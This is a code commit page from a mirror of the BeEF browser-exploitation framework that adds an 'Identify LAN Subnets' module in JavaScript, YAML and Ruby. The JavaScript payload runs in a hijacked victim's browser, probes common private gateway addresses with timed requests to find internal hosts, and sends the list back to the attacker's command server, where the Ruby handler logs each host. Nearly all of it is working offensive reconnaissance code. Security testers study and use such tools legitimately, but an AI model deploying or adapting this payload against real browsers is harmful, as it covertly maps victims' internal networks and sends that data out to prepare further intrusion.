Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Identify LAN Subnets module

Browse Source
This commit is contained in:
Brendan Coles
2015-01-20 15:19:09 +00:00
parent 1318ccf019
commit b105288a9b
3 changed files with 187 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

123
modules/network/identify_lan_subnets/command.js Normal file
View File

@@ -0,0 +1,123 @@
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
if(!beef.browser.isFF() && !beef.browser.isC()){
beef.debug("[command #<%= @command_id %>] Browser is not supported.");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser");
}
var min_timeout = 500;
var ranges = [
'192.168.0.0',
'192.168.1.0',
'192.168.2.0',
'192.168.10.0',
'192.168.100.0',
'192.168.123.0',
'10.0.0.0',
'10.0.1.0',
'10.1.1.0',
'10.10.10.0',
'172.16.0.0',
'172.16.1.0'
];
var doScan = function(timeout) {
var discovered_hosts = [];
var proto = "http";
var doRequest = function(host) {
var d = new Date;
var xhr = new XMLHttpRequest();
xhr.timeout = timeout;
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
var time = new Date().getTime() - d.getTime();
var aborted = false;
// if we call window.stop() the event triggered is 'abort'
// http://www.w3.org/TR/XMLHttpRequest/#event-handlers
xhr.onabort = function(){
aborted = true;
}
xhr.onloadend = function(){
if(time < timeout){
// 'abort' fires always before 'onloadend'
if(time > 1 && aborted === false){
beef.debug('Discovered host ['+host+'] in ['+time+'] ms');
discovered_hosts.push(host);
}
}
}
}
}
xhr.open("GET", proto + "://" + host, true);
xhr.send();
}
var requests = new Array();
for (var i = 0; i < ranges.length; i++) {
// the following returns like 192.168.0.
var c = ranges[i].split('.')[0]+'.'+
ranges[i].split('.')[1]+'.'+
ranges[i].split('.')[2]+'.';
// for every entry in the 'ranges' array, request
// the most common gateway IPs, like:
// 192.168.0.1, 192.168.0.100, 192.168.0.254
requests.push(c + '1');
requests.push(c + '100');
requests.push(c + '254');
}
// process queue
var count = requests.length;
beef.debug("[command #<%= @command_id %>] Identifying LAN hosts ("+count+" URLs) (Timeout " + timeout + "ms)");
var check_timeout = (timeout * count + parseInt(timeout,10));
var handle = setInterval(function() {
if (requests.length > 0) {
doRequest(requests.pop());
}
}, timeout);
// check for results
checkResults = function() {
if (handle) {
beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
clearInterval(handle);
handle = 0;
}
var hosts = discovered_hosts.join(",");
beef.debug("Discovered " + discovered_hosts.length + " hosts: " + hosts);
if (discovered_hosts.length >= 5) {
// if we get 5+ results something probably went wrong. this happens sometimes.
if (timeout > min_timeout) {
// if timeout is more than 500ms then decrease timeout by 500ms and try again
beef.debug("Returned large hit rate (" + discovered_hosts.length + " of " + count + ") indicating low network latency. Retrying scan with decreased timeout (" + (timeout - 500) + "ms)");
doScan(timeout-500);
} else {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unexpected results&hosts="+hosts);
}
} else if (discovered_hosts.length == 0) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no results");
} else {
beef.debug("[command #<%= @command_id %>] Identifying LAN hosts completed.");
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'hosts='+hosts);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
}
}
setTimeout("checkResults();", check_timeout);
}
var timeout = "<%= @timeout %>";
if (isNaN(timeout) || timeout < 1) timeout = min_timeout;
doScan(parseInt(timeout,10));
});

16
modules/network/identify_lan_subnets/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
identify_lan_subnets:
enable: true
category: "Network"
name: "Identify LAN Subnets"
description: "Discover active hosts in the internal network(s) of the hooked browser. This module works by attempting to connect to commonly used LAN IP addresses and timing the response."
authors: ["browserhacker.com"]
target:
working: ["FF", "C"]
not_working: ["IE", "S", "O"]

48
modules/network/identify_lan_subnets/module.rb Normal file
View File

@@ -0,0 +1,48 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
##
# Ported to BeEF from: http://browserhacker.com/code/Ch10/index.html
##
class Identify_lan_subnets < BeEF::Core::Command
def self.options
return [
{'name' => 'timeout', 'ui_label' => 'Timeout for each request (ms)', 'value' => '500'}
]
end
def post_execute
content = {}
content['host'] = @datastore['host'] if not @datastore['host'].nil?
content['hosts'] = @datastore['hosts'] if not @datastore['hosts'].nil?
if content.empty?
content['fail'] = 'No active hosts have been discovered.'
end
save content
configuration = BeEF::Core::Configuration.instance
if configuration.get("beef.extension.network.enable") == true
session_id = @datastore['beefhook']
cid = @datastore['cid'].to_i
# log the network hosts
if @datastore['results'] =~ /^hosts=([\d\.,]+)/
hosts = "#{$1}"
hosts.split(',').flatten.each do |ip|
next if ip.nil?
next unless ip.to_s =~ /^([\d\.]+)$/
print_debug("Hooked browser found host #{ip}")
r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
r.save
end
end
end
end
end